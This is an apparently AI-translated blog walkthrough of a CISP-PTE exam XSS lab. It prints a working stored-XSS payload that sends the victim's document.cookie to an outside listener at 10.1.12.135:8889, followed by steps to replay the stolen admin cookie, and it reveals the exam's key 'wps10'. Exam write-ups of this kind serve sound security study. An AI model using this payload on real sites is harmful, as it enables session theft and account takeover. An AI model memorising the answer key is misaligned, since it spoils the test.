cisp-pte xss exam questions

Jul 20, 2023#渗透测试 #考证242

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

The main focus of XSS is to obtain the administrator's cookie and then forge the administrator's cookie to log in. The process involves creating a payload, starting a web server to receive the cookie, writing the payload in an input field, submitting the query, checking if the Python server received the cookie, copying the cookie, replacing the cookie value, clicking "Edit" to replace it, refreshing the page, and clicking "Admin" to successfully log in and obtain the key "wps10".

The main focus of XSS is to obtain the administrator's cookie and then forge the administrator's cookie for login.

The interface is as follows:

Clicking on "Test" in the above image allows for leaving a message.

Preparing the XSS payload to obtain the cookie:

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Start the web service to receive the cookie:

Python -m SimpleHTTPServer 8889

Write the payload into the input box.

Click "Submit Query".

Wait.

Check if Python has received the cookie.

Copy the cookie.

1acb0fb952b3caaf1ab7277511923138

Replace the cookie value.

Click "Edit" to replace.

Refresh the page and click "Admin".

Successfully logged in and obtained the key.

wps10